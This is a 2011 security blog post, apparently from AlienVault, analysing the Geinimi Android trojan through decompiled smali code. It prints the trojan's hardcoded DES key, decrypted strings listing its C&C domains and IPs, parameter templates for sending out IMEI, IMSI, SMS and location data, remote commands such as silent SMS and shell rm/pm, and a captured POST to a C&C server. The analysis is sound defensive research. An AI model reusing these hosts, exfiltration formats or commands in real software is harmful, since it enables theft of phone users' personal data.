Inside Geinimi Android Trojan. Chapter One: Encrypted data and communication

January 3, 2011 | Jaime Blasco
X

Get the latest security news in your inbox.

Subscribe via Email

No thanks. Close this now.

Last week a new trojan affecting Android phones has been discovered. Called Geinimi, the trojan is hidden into other existing apps.

At the moment, it has been detected only in third-party Chinese app markets and Google Android Market does not seem to be compromised.

The main difference between Geinimi and previously discovered Android Trojans is the potential to communicate with a remote C&C server.

On the first chapter we will analyze how to obtain some encrypted data that the trojan hides as well as the communication with the C&C server.

As we did in the previous analysis of Trojan-SMS.AndroidOS.FakePlayer.a we’ll use the android-apktool to obtain the app resources:

opensourcesim:~# apktool d MonkeyJump2.0.apk 

I: Baksmaling…

I: Loading resource table…

I: Decoding resources…

I: Loading resource table from file: /root/apktool/framework/1.apk

I: Copying assets and libs…

Be sure you use some case-sensitive filesystem because baskmali will crash with a case-insensitive filesystem (ofuscation??)

jaime:Downloads jaimeblasco$ apktool d MonkeyJump2.0.apk 

I: Baksmaling…

Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: File already exists: MonkeyJump2.0/smali/com/dseffects/MonkeyJump2/jump2/A.smali

	at brut.androlib.Androlib.decodeSourcesSmali(Unknown Source)

	at brut.androlib.ApkDecoder.decode(Unknown Source)

	at brut.apktool.Main.cmdDecode(Unknown Source)

	at brut.apktool.Main.main(Unknown Source)

Caused by: brut.androlib.AndrolibException: File already exists: MonkeyJump2.0/smali/com/dseffects/MonkeyJump2/jump2/A.smali

	at brut.androlib.src.SmaliDecoder.decodeClassDefItem(Unknown Source)

	at brut.androlib.src.SmaliDecoder.decode(Unknown Source)

	at brut.androlib.src.SmaliDecoder.decode(Unknown Source)

	... 4 more

Once we have the decoded resources we can find the crypto functions in ./smali/com/dseffects/MonkeyJump2/jump2/e/p.smali:

.method public static b([B)[B

    .locals 3

    const-string v0, "DES"

    :try_start_0

    new-instance v0, Ljavax/crypto/spec/DESKeySpec;

    sget-object v1, Lcom/dseffects/MonkeyJump2/jump2/e/k;->b:[B

    invoke-direct {v0, v1}, Ljavax/crypto/spec/DESKeySpec;->([B)V

    const-string v1, "DES"

    invoke-static {v1}, Ljavax/crypto/SecretKeyFactory;->getInstance(Ljava/lang/String;)Ljavax/crypto/SecretKeyFactory;

    move-result-object v1

    invoke-virtual {v1, v0}, Ljavax/crypto/SecretKeyFactory;->generateSecret(Ljava/security/spec/KeySpec;)Ljavax/crypto/SecretKey;

    move-result-object v0

    const-string v1, "DES"

    invoke-static {v1}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;

    move-result-object v1

    const/4 v2, 0x1

    invoke-virtual {v1, v2, v0}, Ljavax/crypto/Cipher;->init(ILjava/security/Key;)V

    invoke-virtual {v1, p0}, Ljavax/crypto/Cipher;->doFinal([B)[B

    :try_end_0

    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    move-result-object v0

    :goto_0

    return-object v0

    :catch_0

    move-exception v0

    const/4 v0, 0x0

    goto :goto_0

If we follow the function call Lcom/dseffects/MonkeyJump2/jump2/e/k;->b:[B (./smali/com/dseffects/MonkeyJump2/jump2/e/k.smali) and take a look at the routines:

    .array-data 0x1

        0x1t

        0x2t

        0x3t

        0x4t

        0x5t

        0x6t

        0x7t

        0x8t

    .end array-data

We obtain the default DES key used by the trojan. With the key, we find several arrays defined in ./smali/com/dseffects/MonkeyJump2/jump2/e/p.smali that are passed to the decryption function in runtime, example:

    :array_0

    .array-data 0x1

        0x55t

        0x35t

        0x2t

        0x34t

        0x86t

        0x64t

        0x21t

        0x53t

        0x1dt

        0x21t

        0x3dt

        0x3at

        0xd0t

        0xaft

        0xb6t

        0x57t

    .end array-data

Here you can download a python script http://alienvault-labs-garage.googlecode.com/svn/trunk/geinimi/decrypt.py [no longer available] to parse the arrays and print the decrypted data, the output is the following:

python decrypt.py ./smali/com/dseffects/MonkeyJump2/jump2/e/p.smali

debug_internel

debug_outer

[email protected]

http://180.168.68.34:8080/android/getAdXml.do



contactlist

smsrecord

deviceinfo

location

sms

register

call

PostUrl

TicketerText

TitleText

ContextText

ShowMode

call://

email://

map://

sms://

search://

install://

shortcut://

contact://

wallpaper://

bookmark://

http://

toast://

startapp://

.zip

tel://

smsto:

geo:

CmdID

AdID

I

D

content://sms/inbox

content://sms/sent

com.android.launcher.action.INSTALL_SHORTCUT

method=post&IMEI=

&IMSI=

&AdID=

&CPID=

&PTID=

&SALESID=

&msgType=

imei=

&imsi=

&sms=

&type=send

&latitude=

&longitude=

&type=receive

&phone=

&MODEL=%s&BOARD=%s&BRAND=%s&CPU_ABI=%s&DEVICE=%s&DISPLAY=%s&FINGERPRINT=%s&HOST=%s&ID=%s&MANUFACTURER=%s

&PRODUCT=%s&TAGS=%s&TIME=%s&TYPE=%s&USER=%s&SoftwareVersion=%s&Line1Number=%s&NetworkCountryIso=%s

&NetworkOperator=%s&NetworkOperatorName=%s&NetworkType=%s&PhoneType=%s&SimCountryIso=%s&SimOperator=%s

&SimOperatorName=%s&SimSerialNumber=%s&SimState=%s&SubscriberId=%s&VoiceMailNumber=%s&CPID=%s

&PTID=%s&SALESID=%s&DID=%s&sdkver=%s&autosdkver=%s&shell=%s

suggestsms://

silentsms://

method=postlink&IMEI=

&FeatureTag=

text://

method=show&IMEI=

suggestsms

skiptime

changefrequency

&DID=

&sdkver=

&autosdkver=

IMEI

IMSI

CPID

PTID

SALESID

DID

sdkver

autosdkver

latitude

longitude

???????nim?????tom?????????ybo

&applist=

applist

updatehost

www.widifu.com:8080;www.udaore.com:8080;www.frijd.com:8080;www.islpast.com:8080;www.piajesj.com:8080

;www.qoewsl.com:8080;www.weolir.com:8080;www.uisoa.com:8080;www.riusdu.com:8080;www.aiucr.com:8080;117.135.134.185:8080

install

uninstall

showurl

cmd cp

cmd pm

cmd rm

/data/

shell

cmd

kill

start

android.provider.Telephony.SMS_RECEIVED

@@smskey(

@@[email protected](

smskiller

content://sms/conversations/

As we can see, the author took the trouble to hide the stored data that contains for example the C&C domains:

www.widifu.com:8080;

www.udaore.com:8080;

www.frijd.com:8080;

www.islpast.com:8080;

www.piajesj.com:8080;

www.qoewsl.com:8080;

www.weolir.com:8080;

www.uisoa.com:8080;

www.riusdu.com:8080;

www.aiucr.com:8080;

117.135.134.185:8080

If we do a static analysis of the trojan we observe http connections to these servers at five minute intervals. Example communication:

POST /getAdXml.do HTTP/1.1

User-Agent: Dalvik/1.1.0 (...)

Host: 117.135.134.185:8080

Accept: *, */*

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 295



params=113a080016d3838bd9864d760e82d73375da7fa36b5cee41f2abfdd9d0e04c3b9aaf93bf06ed0490e670b4ab4bce6ec9a131f8d368d6a0

99325da2742677388e569a08f1ae2507d0f2abfdd9d0e04c3bf77f7339d5b56855b58a6e3c30c4f07b3f7c0347e2a498ab8619d53210630

f7ec73056aebc1ae56e3fef18cbf35d11c14c372859361c628de3953343b5860f9aHTTP/1.1

We can find all the communication functions on /smali/com/dseffects/MonkeyJump2/jump2/e/n.smali.

If we take a look to the code, we realize that the “params” content is encrypted with the same DES key used to hide the previous data. So if we decrypt the data we obtain:

PTID=33050001&IMEI=000000000000000&sdkver=10.7&SALESID=0006&IMSI=310260000000000&longitude=0.0&latitude=0.0&DID=2001&autosdkver=10.7&CPID=3305

As we can see the trojan is sending personal data (device identifiers; IMEI, IMSI, coordinates…).

In the next chapter we will continue analyzing other advance trojan capabilities. I hope you liked it and happy new hunting year.

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
Read more posts from Jaime Blasco ›

‹ BACK TO ALL BLOGS

Watch a Demo ›
GET PRICE FREE TRIAL